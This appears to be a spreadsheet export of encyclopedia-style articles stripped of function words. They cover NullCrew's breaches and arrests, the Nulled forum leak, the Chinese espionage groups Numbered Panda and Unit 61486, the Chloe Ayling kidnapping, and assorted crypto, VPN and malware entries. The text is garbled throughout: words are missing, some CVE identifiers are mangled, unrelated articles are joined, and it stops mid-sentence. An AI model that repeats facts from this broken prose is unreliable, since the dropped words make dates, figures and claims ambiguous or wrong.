montana's official state website(mt.gov), force health protection readiness(fhpr.osd.mil), official website state louisiana(la.gov), official website state texas (www.texas.gov), united nations (several servers including ones from: unesco un.org.) amount credentials leaked ranked well thousands.on october 2012, group posted twitter feeds; claimed hacked orange. first post, official twitter account, pastebin, containing table, columns, databases orange website. second post came 0rbit contained sensitive information, mysql hosts, users, passwords, fifty corporation government officials email addresses.early beginning year, january 2013: group announced successful attacks, first u.s. department homeland security's study states (supporting claim u.k. attack.) contained (from ehackingnews) hacker group published data compromised server including database host, user, password database name. hackers compromised details managed access wp-config.php file. second attack sharp electronics united kingdom; group released entire mysql sharp day.on january 2013: group released third installment #fuckthesystem e-zine, particular release contained data main server un.org (hundreds passwords, usernames, addresses, details.) wasatch, microsoft partner; group claimed exploited servers domain hosted server containing exploit allowed yank details wasatch servers (it, software) leaked data servers email addresses, usernames, passwords even including wordpress details. attack also affected university wisconsin leading mysql table column structure leaked public.on march 2013: group successfully infiltrated defaced time-warner cables support services left web-page defaced; group proclaimed attack took place cable companies participation many others deemed unfair practice.. known strikes. attack took place targeted time-warners support system, noticing began skimming took notice support systems login server used username admin, password "changeme" group bypassed security measures, shelled server left index defaced (mirror here: http://www.freezepage.com/1362546977ofvsjkbyge) attack done core members group: docofcock 0rbit.the group returned february 2014 dropped 20,000+ usernames, passwords, emails, along list credit card information bell canada; bell claimed servers affected, instead third-party involved attack. attack noted post injection bell's protection management login. attackers provided screenshots contained proof bell's knowledge attack dating back 15th january, well results execution queries, bell claims working law-enforcement investigate attack further.nullcrew hacked comcast servers february 2014, publicly shared passwords comcast email servers. attack allowed comcast email servers using software known zimbra, attack method lfi.on april 2014; after brief period silence, group returned announcing begun working group name horsemen lulz. groups detailed attack alarabiya's email-servers, like comcast, media company used zimbra email services. release contained alarabiya's etc./passwd/ file, along several ldap credentials mysql credentials; they also released exploitable path etc./passwd/ localconfig.xml full. exploit was, like comcast, lfi.on april 2014; marijuana smokers holiday nullcrew hacktivist group released called fifth installation e-zine #fuckthesystem. this consisted university virginia, spokeo, klas telecom, arma2, science technology center ukraine, state indiana, national credit union, telco systems batm, international civil aviation organization. e-zine contained link file mega.co.nz titled "fts5-data.rar" this file uncompressed contains tens thousands emails, several databases, /etc/passwd files, whole more. this zine known largest release date. views group person using pseudonym null, describes supporting wikileaks founder julian assange well types corruption. possible arrests 2013, lewys martin, identified "sl1nk" nullcrew hacktivist group, arrested apparent charges hacking "cambridge university". this matched claims group, different data leaks members, sl1nk took site distributed denial service. other supposed targets member included pentagon nasa. sentenced years prison.in june 2014; morristown, tennessee name timothy justen french arrested connection nullcrew. accused hacking into: university virginia, spokeo, klas telcom, comcast, university hawaii, department state, bell canada. criminal complaint, stated arrest allowed information provided confidential informant; this informant later outed zer0pwn siph0n.also, june 2014; quebec canadian teenager arrested rcmp, teenager believed individual null/zer0pwn nullcrew. arrested connection hacking canadian telecommunications company bell canada; arrest allowed communication confidential informant, later outed twitter siph0n. zer0pwn also claimed tested boundaries entrapment allowing hack multiple targets watching nothing prevent exploits. teenager pleaded guilty count unlawful computer access, sentenced probation banned accessing internet. references external links official twitter feed twitter</t>
  </si>
  <si>
    <t>Nulled</t>
  </si>
  <si>
    <t>nulled online cracking forum. 2016, nulled became known target data breach helped enforcement obtain information possible 'suspects', registered nulled. data breach 2016, nulled hacked database leaked. leaked data contained 9.65gb users' personal information. leak included complete mysql database file contained website's entire data. this data breach included 4,053 user accounts, paypal email addresses, along cracked passwords, 800,593 user personal messages, 5,582 purchase records 12,600 invoices. data breach also exposed email addresses hosted government domains. identity crew took nulled's database known, speculation state-sponsored hackers involved. another article reported romanian group claimed responsibility data breach. references</t>
  </si>
  <si>
    <t>Numbered Panda</t>
  </si>
  <si>
    <t>numbered panda (also known ixeshe, dyncalc, dnscalc, apt12) cyber espionage group believed linked chinese military. group typically targets organizations east asia. these organizations include, limited media outlets, high-tech companies, governments. numbered panda believed operating since 2009. however, group also credited 2012 data breach york times. group's typical techniques send files loaded malware spear phishing campaigns. decoy documents typically written traditional chinese, widely used taiwan, targets largely associated taiwanese interests. numbered panda appears actively seeking cybersecurity research relating malware use. after arbor networks report group, fireeye noticed change group's techniques avoid future detection. discovery security reports trend micro first reported numbered panda 2012 white paper. researchers discovered group launched spear phishing campaigns, using ixeshe malware, primarily east asian nations since approximately 2009. crowdstrike discussed group 2013 blog post whois numbered panda. this post followed 2012 attack york times subsequent 2013 reporting attack. june 2014, arbor networks released report detailing numbered panda's etumbot target taiwan japan. september 2014, fireeye released report highlighting group's evolution. fireeye linked release arbor networks report numbered panda's change tactics. attacks east asian nations (2009-2011) trend micro reported campaign east asian governments, electronics manufacturers, telecommunications company. numbered panda engaged spear phishing email campaigns malicious attachments. often, malicious email attachments would files exploited cve-2009-4324, cve-2009-09274, cve-2011-06095, cve-cve-2011-0611 vulnerabilities adobe acrobat, adobe reader, flash player. attackers also used exploit affected microsoft excel cve-2009-3129. ixeshe malware used campaign allowed numbered panda list services, processes, drives; terminate processes services; download upload files; start processes services; victims’ user names; machine's name domain name; download execute arbitrary files; cause system pause sleep specified number minutes; spawn remote shell; list current files directories. after installation, ixeshe would start communicating command-and-control servers; oftentimes three servers hard-coded redundancy. numbered panda often used compromised servers create command-and-control servers increase control victim's network infrastructure. using technique, group believed amassed sixty servers 2012. majority command-and-control servers used campaign located taiwan united states. base64 used communication compromised computer server. trend micro found that, decoded, communication standardized structure detailed computer's name, local address, proxy server port, malware researchers crowdstrike found blogs wordpress sites frequently used command-and-control infrastructure make network traffic look legitimate. japan taiwan (2011-2014) arbor security report found numbered panda began campaign japan taiwan using etumbot malware 2011. similar previously observed campaign, attackers would decoy files, pdf, excel spreadsheets, word documents, email attachments gain access victims' computers. most documents observed written traditional chinese usually pertained taiwanese government interests; several files related upcoming conferences taiwan. once malicious file downloaded extracted victim, etumbot uses right-to-left override exploit trick victim download malware installer. according arbor security, "technique simple malware writers disguise names malicious files. hidden unicode character filename reverse order characters follow .scr binary file appears .xls document, example." once malware installed, sends request command-and-control server encrypt subsequent communication. ixeshe malware, numbered panda used base64 encoded characters communicate compromised computers command-and-control servers. etumbot able determine target computer using proxy bypass proxy settings directly establish connection. after communication established, malware send encrypted message infected computer server netbios name victim's system, user name, address, system using proxy.after 2014 arbor security report detailed etumbot, fireeye discovered numbered panda changed parts malware. fireeye noticed protocols strings previously used changed june 2014. researchers fireeye believe change help malware evade detection. fireeye named version etumbot hightide. numbered panda continued target taiwan spear phishing email campaigns malicious attachments. attached microsoft word documents exploited cve-2012-0158 vulnerability help propagate hightide. fireeye found compromised taiwanese government employee email accounts used spear phishing. hightide differs etumbot http request changed user agent, format structure http uniform resource identifier, executable file location, image base address. york times (2012) numbered panda believed responsible computer network breach york times late 2012. attack occurred york times published story relatives jiabao, sixth premier state council people's republic china, "accumulated fortune worth several billion dollars business dealings." computers used launch attack believed university computers used chinese military attack united states military contractors. numbered panda used updated versions malware packages aumlib ixeshe. updated aumlib allowed numbered panda encode body post request gather victim's bios, external operating system. version ixeshe altered previous version's network traffic pattern effort evade existing network traffic signatures designed detect ixeshe related infections. references</t>
  </si>
  <si>
    <t>Abduction of Chloe Ayling</t>
  </si>
  <si>
    <t>abduction chloe ayling occurred july 2017 ayling, british page model, travelled milan, italy fake photo-shoot. there, abducted individuals claiming members criminal organisation called black death group. june 2018, lukasz herba, polish national united kingdom, convicted milan court kidnapping sentenced years nine months prison. 2021, 16-year sentence michal herba reduced appeal years months. sentence lukasz herba already reduced, 2020, years month. abduction ayling, coulsdon aged time incident, working london phil green's supermodel agency. march 2017, green, lawyer part-time previously brokered failed photo-shoot paris ayling later revealed scheme organised lukasz herba, 30-year-old polish computer programmer oldbury, west midlands, alias "andre lazio". july 2017, ayling photo-shoot dubai, green contacted lazio, requesting another attempt photo-shoot milan july.when ayling return gatwick night, mother contacted green. next morning, green received ransom email, ostensibly black death group written "md" (another herba alias) demanding €300,000 else ayling would auctioned sex-slave dark july. green contacted consulate milan support. italian police visited address, turned photo studio all. inside, found ayling's clothes, and, absence evidence emails, investigation stalled. however, days, monday july, ayling herba turned together milan consulate, suspicion quickly fell couple cctv footage together public emerged. trial trial, italian court heard herba injected ayling ketamine evidenced injection mark traces drug hair), handcuffed holdall bag, drove boot house near turin. throughout kidnapping, herba used alias befriend ayling manipulating events kidnapping fictional auction. herba claimed defence fallen love ayling trying promote career creating scandal. june 2018, herba convicted kidnapping sentenced years nine months prison; herba said closing statement trial inspired watching movie means.shortly investigation, herba's brother, michał herba (37), runs transport logistics company called trans logistics limited, also arrested. michał herba, denies involvement, alleged participated kidnapping given presence accomplice. based email evidence (his hair found car's boot), extradited october 2018, currently standing trial case. aftermath case brought attention "the black death group", organisation alleged exist eastern europe operating dark frequently-changing urls. group investigated interpol 2015. group known posted images captives sale; however, postings largely considered fake, since investigation determined taken pornographic film.ayling green wrote memoirs events. british media, particular, quick suspect kidnapping publicity stunt. ayling also criticised media leveraging event benefit career. references external links chloe ayling imdb</t>
  </si>
  <si>
    <t>Alex Gladstein</t>
  </si>
  <si>
    <t>alex gladstein currently chief strategy officer human rights foundation. previous that, served vice president strategy oslo freedom forum. gladstein outspoken supporter bitcoin advocates widespread adoption. biography alex gladstein written extensively support widespread adoption bitcoin, spoken support specifically bitcoin cryptocurrency replacement fiat money. gladstein, role chief strategy officer (human rights foundation), seeks promote bitcoin means avoid censorship regards peer-to-peer transactions take place without centralized control, decision maker, authority. gladstein work featured prominent media publications time magazine, reason, atlantic, york times, npr, wired magazine. also bitcoin blockchain satoshi nakamoto references</t>
  </si>
  <si>
    <t>Abeille (local currency)</t>
  </si>
  <si>
    <t>abeille name community currency started 2010 villeneuve-sur-lot, france. named french word bee. abeille program intended promote local commerce. abeille operates fixed exchange rate: abeille creation objectives initiative local ngo, "agir pour vivant" (act living), abeille intended promotion sustainability: organic food renewable energy among others strengthening solidarity: enhancing human relationship local shoppers businesses stimulation local economy. currency issue, exchange acceptance bills abeille issued. they feature drawings painter jean-claude maurel obverse, photograph flower photographer christian aymé reverse.to maintain individual bill's validity, "scrip" corresponding banknote value must paid every months. (this system, called demurrage, form currency circulation invented silvio gesell.) also berkshares chiemgauer occitan references</t>
  </si>
  <si>
    <t>Aleksi Kolarov</t>
  </si>
  <si>
    <t>Alcra (computer worm)</t>
  </si>
  <si>
    <t>w32.alcra. computer worm spread file sharing networks. regarded low-risk virus, usually detected virus scan. effects w32.alcra. worm saves number empty files links computer, attempts connect links thus causing error. detection removal full system scan usually find, remove worm without much difficulty. references</t>
  </si>
  <si>
    <t>PLA Unit 61486</t>
  </si>
  <si>
    <t>unit 61486 (also known putter panda) people's liberation army unit dedicated cyberattacks american, japanese, european corporations focused satellite communications technology. unit takes part china's campaign steal trade military secrets foreign targets.in 2014 exposed public report made crowdstrike, digital security firm. member unit 61486 identified chen ping, online alias "cpyy". unit 61486 also nicknamed "putter panda" security firm crowdstrike, reference chinese origins ("panda") penchant targeting golf players ("putter").its exposure came another unit, unit 61398, exposed similar activity, previous year, well indictment five members unit 61398 united states previous month. meanwhile, edward snowden's release information america's surveillance program would also become focal point china's response accusations spying, using evidence united states hypocritical accusations espionage. history unit 61486 bureau within operations third department general staff department. name, unit 61486, military unit cover designator (mucd), used hide unit's true identity. earliest signs unit's existence comes 2007. unit 61486 12th bureau within third department, majority cyber attacks focused targeting american, european, japanese industries worked aerospace satellite. they believed focused space technology. operations they primarily done work technique known spear-phishing, also known remote access tools (rat), targeting members industries noted above, specifically members played golf major targets operations. they would emails word documents detailed information related conferences, remote access tool would installed allowing victims computer accessed. example operation seen email brochure appeared yoga studio toulouse would steal personal information person opened email. from crowdstrike's report, claim unit 61486 used adobe reader microsoft office vessels malware. according crowdstrike, attack canadian national research council 2014 could also attributed unit 61486. crowdstrike's chief technology officer dmitri alperovitch would attack similar ones conducted unit 61486 past, claiming certainly looks like actors track china we’ve seen going aircraft manufacturers past,". however, canada stated attack done state actors working china, saying highly sophisticated chinese state-sponsored actor" responsible attack. their statement directly attribute unit 61486.in response allegations, ministry foreign affairs people's republic china would demand canada stop making claims. foreign ministry spokesman gang saying evidence back claim accusation unjustified provocation. exposing operations june 2014, security firm crowdstrike released report detailing actions unit 61486, well potential member unit. crowdstrike states reason releasing report publicly china's statement following united states indictment members unit 61398. china responded indictment claiming lies, information used fabricated. crowdstrike, george kurtz states publicly released report provide irrefutable evidence china's involvement cyber espionage, means counter claims made chinese government.: "this report part extensive intelligence library made available intelligence subscribers april 2014, prior government’s criminal indictment china’s subsequent refusal engage constructive dialog believe u.s. government indictments global acknowledgment awareness important steps right direction. support efforts, making report available public continue dialog around ever-present threat." another releasing report show international community indictment individuals cyber espionage limit china's cyber espionage program, program limited targeting united states. rather "the iceberg" george kurtz wrote, campaigns taking place across world.the investigation revealed potential member unit alias "cpyy". several emails used alias registered person name chen ping. personal blog 163.com, lists persons employment either military police, also lists birth date 1979. page also posts category, whilst related separate blog linked chen ping indicated either studied worked networking programming 2002 2003. this report also pointed several images personal sina.com blog said attended shanghai jiao tong university, university allegedly targeted recruitment pla. addition, several posts suggested member pla, photos uniforms background. personal blog chen ping listed work military, whilst different blog, post said "soldier’s duty defend country, long country safe, military excellent.", suggesting chen held nationalistic ideals would encourage join armed forces. this blog also states chen ping lived shanghai 2005 2007. however, page last updated 2007 taken following release crowdstrike's report.based previous addresses photos chen ping's multiple personal blogs, crowdstrike states headquarters unit within zhabei district shanghai. furthermore, several website domains registered chen ping address close building took photo posted caption "office". additionally, personal photos showed large satellite dish installations. from crowdstrike's investigations believed unit 61486 involved space surveillance also targeting western companies manufactured researched satellites. thus satellite dishes related activity. webpage published chinese government entity details theatrical performances involving members listed address also corresponds area buildings chen ping's photos. with address site well personal photos chen pings blogs, crowdstrike states believe building headquarters unit 61486.this report also suggested unit 61486 works alongside unit 61398, another unit within third department. several domains registered alleged members 61486 address ones unit 61398. addition allegations cooperation unit 61398, another unit, vixen panda, mentioned connection unit 61486, address used vixen panda sites also associated domain unit 61486 used. furthermore, "cpyy" (chen ping) also found interact individual listed "linxder", cpyy.org, cpyy's site. individual linxder handle someone part comment panda, another hacking group believed shanghai.following exposing chen ping "cpyy", information taken report released. additionally, according crowdstrike believe chen ping moved shanghai kunming yunnan province. according project 2049 institute, unit 61486 facility region. this report available subscribers crowdstrike since april 2014 however, following public release report would responses made united states well chinese foreign ministry. official response chinese foreign ministry previous year, security firm mandiant exposed unit 61398, similar activity unit 61486. month report unit 61486 released, united states indicted people believed members unit 61398, cyber espionage, marking first time charge levelled state actors. exposing unit 61486 raised tensions nations higher. this foreign ministry threatening start trade united states, well inspections regulations technologies coming country. additionally, china would pull several meetings united states issue hacking. additionally spokeswoman china’s foreign ministry hearing allegations unit 61486 listed crowdstrike's report, scorned giving "déjà vu", reference report made mandiant year before.edward snowden exposed united states spying programs conducted year unit 61486 revealed crowdstrike report. this brought foreign ministry spokeswoman chunying, example united states hypocritical accusations china stealing information western corporations. spokeswoman chunying would state united states right accuse others hacking, caught stated united states "hacker empire". press conference foreign ministry spokeswoman chunying states "the united states cannot pretend victim. they hacker empire. think everyone world knows this." addition, earlier year revealed york times spiegel also hacked huawei's servers. this done relationship huawei, however quickly expanded developing exploits would allow access networks conduct surveillance "offensive operations". this operation known "shotgiant" conducted despite house intelligence committee report 2012 stated connection huawei, along another entity known ztf. this also brought foreign ministry another case american hypocrisy spying allegations. foreign ministry spokesperson iterated report could correct, saying ridiculous someone would sort work would open hacker. news brief, foreign ministry spokeswoman chunying states:"i think curious puzzling. have ever seen thief street advertises chest thief? honestly speaking, think u.s. done cannot accepted correct." addition allegations, week report released, chinese government criticised united states department defense releasing report said believed china's actual military spending estimated $145 billion dollars. report additionally warned china speeding military modernisation program. however, even though tensions relations nations already poor, increasing events allegations. china would still accept invitation participate rimpac occur within month. this would mark first time china would participate american naval drill, though previously participated 1998 observers. they would send ships total, destroyer, frigate, supply ship hospital ship. also unit 61398 references</t>
  </si>
  <si>
    <t>Nymwars</t>
  </si>
  <si>
    <t>nymwars name given series conflicts policies mandate users certain internet communications platforms identify using legal names. term mostly associated google's name policies google+ youtube. nymwars blend word composed (pseudo)nym wars. name appears gained prominence hashtag "#nymwars" twitter. conflicts regarding google+ began july 2011 social networking site began enforcing real name policy suspending accounts users felt following policy. pseudonyms, nicknames, non-standard real names (for example, mononyms names include scripts multiple languages) suspended. issue settled july 2014 google announced ending real-name policy.a predecessor google+ conflict blizzard's realid, starting july 2010, exposes name player's credit card, mandatory game features (cross-game chat) nearly made mandatory post discussion forums.these issues existed since beginning online identity, related alleged online disinhibition effect. resulting discussions raised many issues regarding naming, cultural sensitivity, public private identity, privacy, role social media modern discourse. debate covered widely press including wired, atlantic, york times. google google plus launched late june 2011. time launch, site's user content conduct policy stated, help fight spam prevent fake profiles, name friends, family co-workers usually call you." many users signed using nicknames, handles, stage names, names commonly known, necessarily match name government-issued first suspensions name-related reasons occurred july 2011, included limor fried's account included name "ladyada" widely known), nerdcore rapper doctor popular, weekly angeles times columnist a.v. flox. account suspensions following weeks included using nicknames, handles, pseudonyms; whose legal names unusual, including mononymous users; users google mistakenly believed impersonating famous individuals, facebook employee mozilla founder blake ross, actor william shatner.awareness issue grew rapidly, twitter, google+ itself, variety media outlets. early august, electronic frontier foundation posted case pseudonymity" response issue.google initially responded july vice president bradley horowitz promised improvements suspension enforcement process. august, google implemented "grace period" suspension, august, "verified account" program celebrities high-profile users.on october 2011, summit, google executive gundotra revealed google+ would begin supporting pseudonyms types identity within months. however, october 2012 policy documents, google still required participants "use common first last name" adding "our name policy everyone time."on july 2014, google indicated real-name policy ended, announcing "over years, google+ grew community became established, steadily opened policy, allowing +page owners name choosing letting youtube users bring usernames google+. today, taking last step: restrictions name use." expired google policy google's official support page described real-names policy, since abandoned: google+ makes connecting people like connecting people real world. because this, it’s important common name people want connect find you. your common name name friends, family co-workers usually call you. example, legal name charles jones normally chuck jones junior jones, would acceptable google offers support assistance anyone whose profile suspended, including appeal process, referral content policy. account suspended, users able access google services require active profiles, buzz, reader, picasa. they will, however, able access google services gmail. google suggested naming policy everyone, recommended user chooses comply, make copy google+ data, leave. google's previous stance google support worker stated: google profiles product works best identified state. this certain you’re connecting right person, others confidence knowing someone real behind profile they’re checking out. reason, google profiles requires name commonly daily life. august 2011, google eric schmidt quoted stating google+ intended identity management service social network, real names would necessary planned google products based service. also asserted "the internet work better people know real person rather fake person".google vice president bradley horowitz google+ post january 2012) announced google updating policy broaden support established pseudonyms". however, updated policy criticized vague concerning "established" pseudonym, insufficiently flexible protect online privacy. criticism number high-profile commentators publicly criticized google's policies, including technologists violet blue, jamie zawinski, kevin marks, robert scoble organisations electronic frontier foundation.criticisms wide-ranging, example: policy fails acknowledge long-standing internet culture conventions. using real names online disadvantage endanger individuals, victims violence harassment. using pseudonym different anonymity, pseudonym used consistently denotes "authentic personality". google's arguments fail address financial gain represented connecting personal data real-world identities. google inconsistently enforced policy, especially making exceptions celebrities using pseudonyms mononyms. policy stated insufficient preventing spam. policy afoul legal constraints german "telemediengesetz" federal law, makes anonymous access online services legal requirement. policy prevent trolls. social media encourage growth healthy social norms, forcefully telling people must behave cannot efficient. facebook facebook always "real name" policy enforcement traditionally sporadic usually dependent reports users. november 2011, facebook suspended salman rushdie's account, reinstated little-used first name ahmed, backing restoring preferred name.in fall 2014, facebook began requiring drag performers change facebook identities legal names, notably including performer sister roma. this reported work single person systematically reporting them. u.s. department justice november 2011 united states department justice said wants retain ability computer fraud abuse prosecute people provide false information online intent harm others. this statement, coming shortly google+ facebook actions, raised fears users could face criminal prosecution using pseudonyms. justice department said would power select cases, case 2011 prosecuted woman used myspace account fake name bully 13-year-old girl eventually committed suicide. references</t>
  </si>
  <si>
    <t>Abra (company)</t>
  </si>
  <si>
    <t>abra financial services technology company operates cryptocurrency wallet service including trading service buying selling cryptocurrencies, service earning interest cryptocurrencies stablecoins, lending services borrowing cryptocurrency collateral. history abra founded 2014 silicon valley bill barhydt, former fixed income analyst goldman sachs former director netscape.abra operates cryptocurrency wallet built-in crypto swap service called abra trade, crypto lending service called abra borrow, crypto staking service called abra earn. march 2018, abra added support cryptocurrencies including litecoin, bitcoin cash stellar.in september 2021 abra announced raised additional $55m series funding bringing total raised date $85m. investors financing included american express ventures, blockchain capital, kingsway capital digital ventures.abra barhydt started youtube series money talks. interviews included ethereum founder vitalik buterin, microstrategy bitcoin supporter michael saylor, bitcoin cash supporter roger ver, zcash creator zooko wilcox, bitwise hunter horsley, venture capitalists adam draper. june 2018, abra listed wall street journal "top tech companies watch 2018".in 2021 forbes named abra next billion-dollar startups. also cryptocurrency exchange cryptocurrency wallet references external links official website</t>
  </si>
  <si>
    <t>OKX (company)</t>
  </si>
  <si>
    <t>(simplified chinese: traditional chinese: 歐易), formerly known okex, seychelles-based cryptocurrency exchange derivatives exchange provides platform trading various instruments spot derivative. some exchange's core features include spot derivative trading. founded star (徐明星) 2017. owned group, also owns crypto exchange okcoin. available based investors. company's haider rafique.initially headquartered beijing, china, blanket chinese regulators. october 2021, issued "notice regulatory policy mainland china", announcing would continue policy "withdrawing chinese mainland market" would establish office team region. however, according caixin, although exchange officially announced would longer office mainland china, still large number staff working region, including engineers, continue work form third-party outsourcing companies. history company launched star 2017 headquartered seychelles. 2018 april 2018, company announced expansion malta, given country's efforts provide sound regulatory framework blockchain businesses digital asset exchanges.in 2018, exchange became world's largest cryptocurrency exchange reported turnover.in june 2018, platform became largest exchanges launch offer cryptocurrency exchange white label service, applicants must solid industry experience $2.5 million accounts. 2019 november 2019, digital asset exchange rules announced hong kong securities futures commission (sfc). according reuters, said expect many exchanges opting regulations, said rules positive industry.on november 2019, cryptocurrency exchange said previously opened indian telegram group year prior opening indian operations.on november 2019, company announced four major partners global utility token "okb". 2021 according reuters, february 2021 biggest trading volume history, previous month $188 billion. typically cryptocurrency coin listing okx, coin showed positive price jump five days later.in june 2021, keywords "okex", "binance" "huobi" blocked baidu, weibo chinese internet platforms. 2022 january 2022, okex rebranded okx.in march 2022, rejected calls russian crypto trading. month, football team manchester city announced partnership official cryptocurrency partner. 2022, signed sponsorship deal mclaren primary partner. criticism controversies february 2018, dongguan public security bureau officially opened criminal case possible "illegal futures trading" seriously, "fraud".in march 2018, major cryptocurrency exchanges said charging million dollars tokens listed. response insider, manager denied this, saying listing fees tokens.on march 2018, sylvain ribes, trader investor, published article titled chasing fake volume: crypto-plague, concluded analysis publicly available data approximately trading volume faked.on july 2018, trader reportedly bought bitcoin futures $416 million notional value margin, forced exchange liquidate position large loss. exchange injected 2,500 bitcoins worth million current prices insurance fund help minimize impact clients. however, cover outstanding amount, traders made unrealized profit previous week still clawback rate percent, so-called "socialized clawback".okx experienced several downtime incidents, serious occurred september 2018, exchange suddenly experienced problems flashbacks, inability platform, inability view contracts. subsequently, many investors crowded beijing, institution headquartered time, defend rights. evening 10th month, founder exchange, star summoned shanghai public security authorities assist investigation alleged digital currency fraud.in october 2019, star yongxing yang dispute frequently mentioned. yang broke news media several accounts platform frozen cancelled reason, assets worth combined total million vanishing thin air, case star investors officially filed hangzhou internet court.on october 2020 temporarily suspended withdrawals following founder's alleged arrest. november 2020 announced withdrawals would reopen resume november also list cryptocurrency exchanges cryptocurrency blockchain list bitcoin companies references external links official website</t>
  </si>
  <si>
    <t>PTK Forensics</t>
  </si>
  <si>
    <t>forensics (ptk) non-free, commercial versions digital forensics tool sleuth (tsk). also includes number software modules investigating digital media. software developed anymore. runs interface sleuth kit, acquiring indexing digital media investigation. indexes stored database searching part digital investigation. calculates hash signature (using sha-1 md5) acquired media verification consistency purposes. references external links sourceforge.net download site</t>
  </si>
  <si>
    <t>OPIE Authentication System</t>
  </si>
  <si>
    <t>opie initialism "one time passwords everything". opie mature, unix-like login password package installed server client makes untrusted networks safer password-sniffing packet-analysis software like dsniff safe shoulder surfing. works circumventing delayed attack method password never used twice installing opie. opie implements one-time password (otp) scheme based s/key, require secret passphrase (not echoed) generate password current session, list passwords print carry person. opie uses hash function generate passwords. opie restrict logins based address. uses passwd login modules. enter enter pressed password prompt, turn echo typed seen entering unfamiliar password printout. opie improve security accessing online banking conferences, hotels airports. some countries require banks implement otp. opie shipped dragonfly bsd, freebsd opensuse. installed unix-like server clients improved security. commands opiepasswd opiekey references otpw external links opie linux wiki opie text freebsd manual</t>
  </si>
  <si>
    <t>NotCompatible</t>
  </si>
  <si>
    <t>notcompatible complex malware infects android-based phones. revealed late 2014 thought infected hundreds thousands phones. references</t>
  </si>
  <si>
    <t>PUM.bad.proxy</t>
  </si>
  <si>
    <t>pum.bad.proxy form malware known "registry hack", unauthorized alteration windows registry file specifically redirects settings within internet explorer, popular browser commonly installed default browser microsoft windows. first spotted users malwarebytes' anti-malware security software january 2011, reported malwarebytes software times first alone. details name assigned malwarebytes' anti-malware specific name unique virus hack. "pum" defines "potentially unwanted modification," "bad.proxy" defines modification. ability search alert user "potentially unwanted modifications" added malware bytes november, 2010. likely first users began reporting pum.bad.proxy first hack existed, rather first time malware bytes could alert user vulnerability. also, fact proxy server often active malware bytes alerts user presence indicate remnant virus, hack, malicious software previously removed quarantined. hack alters proxy server address settings redirect access requests back computer's internal address, 127.0.0.1, effectively cutting computer access internet. origin method propagation currently unknown. altered registry setting affects users internet explorer (including recent version, internet explorer browsers firefox depend upon specific windows registry item proxy address port settings. registry value affected affected registry value hkey_current_user\software\microsoft\windows\currentversion\internet settings\proxyserver. this value "127.0.0.1", computer's internal address network card. various port numbers reported. also iloveyou nimda worm references</t>
  </si>
  <si>
    <t>NordPass</t>
  </si>
  <si>
    <t>nordpass proprietary password manager launched 2019. meant help users organise passwords secure notes, keeping single place encrypted password vault. this service comes free premium versions, though free version lacks much paid functionality like multi-device login. nordpass cross-platform application available windows, macos, linux, android, ios. also offers browser extensions google chrome, mozilla firefox, microsoft edge, brave, opera, safari. history nordpass developed cybersecurity team created nordvpn, service provider. security features nordpass built chacha20 encryption algorithm specifically xchacha variant. nordpass zero-knowledge architecture, meaning passwords encrypted user's device stored cloud. this way, nordpass cannot view, edit, manage users’ passwords. encrypted vault acts digital safe users store login credentials, secure notes, credit card details. master password serves unlocks encrypted vault. master password protects user's passwords, user make strong. nordpass provides two-factor authentication (2fa). supports multiple authentication apps, including google authenticator, duo, authy. latest release includes fido support. this means work yubikey third party security keys. though protection embedded service login instead weakness. nordpass provides secure password sharing feature allows secure sharing passwords nordpass users. nordpass scan data breaches password leaks. nordpass identify weak, reused, passwords divides weak, reused, old.an independent cybersecurity firm, cure53, february 2020 conducted audit confirmed security nordpass password manager.nordpass based panama, mandatory data retention laws participate five eyes fourteen eyes alliances. this means company required keep logs share governments. reception nordpass relatively player password manager market named “new block”. some tech review sites noticed still lacks features. according mag, offers advanced features form-filling, folders, security monitoring, support”.nordpass conducted number research studies. nordpass also mentioned many influential tech websites, wired, forbes, business insider, techradar. references</t>
  </si>
  <si>
    <t>NordVPN</t>
  </si>
  <si>
    <t>nordvpn service applications microsoft windows, macos, linux, android, ios, android manual setup available wireless routers, devices, platforms.nordvpn developed nord security, company creates cybersecurity software initially supported lithuanian startup accelerator business incubator tesonet. nordvpn operates jurisdiction panama, country mandatory data retention laws participate five eyes fourteen eyes intelligence sharing alliances. offices located lithuania, united kingdom, panama netherlands. history nordvpn established 2012 group childhood friends included okman. late 2016, presented android app, followed june year. october 2017, launched browser extension google chrome. june 2018, service launched application android june 2021, nordvpn operating 5,600 servers countries.in march 2019, reported nordvpn received directive russian authorities join state-sponsored registry banned websites, would prevent russian nordvpn users circumventing state censorship. nordvpn reportedly given month comply, face blocking russian authorities. provider declined comply request shut russian servers april result, nordvpn still operates russia, russian users access local servers.in september 2019, nordvpn announced nordvpn teams, solution aimed small medium businesses, remote teams freelancers, need secure access work resources. years later, nordvpn teams rebranded nordlayer moved towards sase business solutions. press sources quoted market rise sase technology factors rebrand.on october 2019, nordvpn announced additional audits public bounty program. bounty launched december 2019, offering researchers monetary rewards reporting critical flaws service.in december 2019, nordvpn became five founding members newly formed 'vpn trust initiative', promising promote online security well self-regulation transparency industry. 2020, initiative announced areas focus: security, privacy, advertising practices, disclosure transparency, social responsibility.in august 2020, troy hunt, australian security expert founder have been pwned?, announced partnership nordvpn strategic advisor. blog, hunt described role "work nordvpn tools messaging view helping make great product even better."in october 2020, nordvpn started rolling first colocated servers finland secure hardware perimeter. ram-based servers fully owned operated nordvpn attempt keep full control.in april 2022, nordvpn's parent company nord security raised $100 million round funding novator. company's valuation reached $1.6 billion. technology nordvpn routes users' internet traffic remote server service, thereby hiding address encrypting incoming outgoing data. encryption, nordvpn using openvpn internet exchange v2/ipsec technologies applications also introduced proprietary nordlynx technology 2019. nordlynx tool based wireguard protocol, aims better performance ipsec openvpn tunneling protocols. according tests performed wired nordlynx produces "speed boosts hundreds mb/s conditions."in april 2020, nordvpn announced gradual roll-out wireguard-based nordlynx protocol platforms. wider implementation preceded total 256,886 tests, included virtual machines nine different providers, cities, eight countries. tests showed higher average download upload speeds openvpn ikev2. time nordvpn also used l2tp/ipsec point-to-point tunneling protocol (pptp) connections routers, later removed, largely outdated insecure. nordvpn desktop applications windows, macos, linux, well mobile apps android android app. subscribers also access encrypted proxy extensions chrome firefox browsers. subscribers connect devices simultaneously.in november 2018, nordvpn claimed no-log policy verified audit pricewaterhousecoopers ag.in 2020, nordvpn underwent second security audit pricewaterhousecoopers testing focused nordvpn’s standard vpn, double vpn, obfuscated (xor) vpn, servers, product’s central infrastructure. audit confirmed company’s privacy policy upheld no-logging policy true again.in 2021, nordvpn completed application security audit, carried security research group versprite. versprite performed penetration testing and, according company, found critical vulnerabilities. flaw bugs found audit since patched.in december 2020, nordvpn started network-wide rollout gbit/s servers, upgrading earlier gbit/s standard. company's servers amsterdam tokyo first support gbit/s, 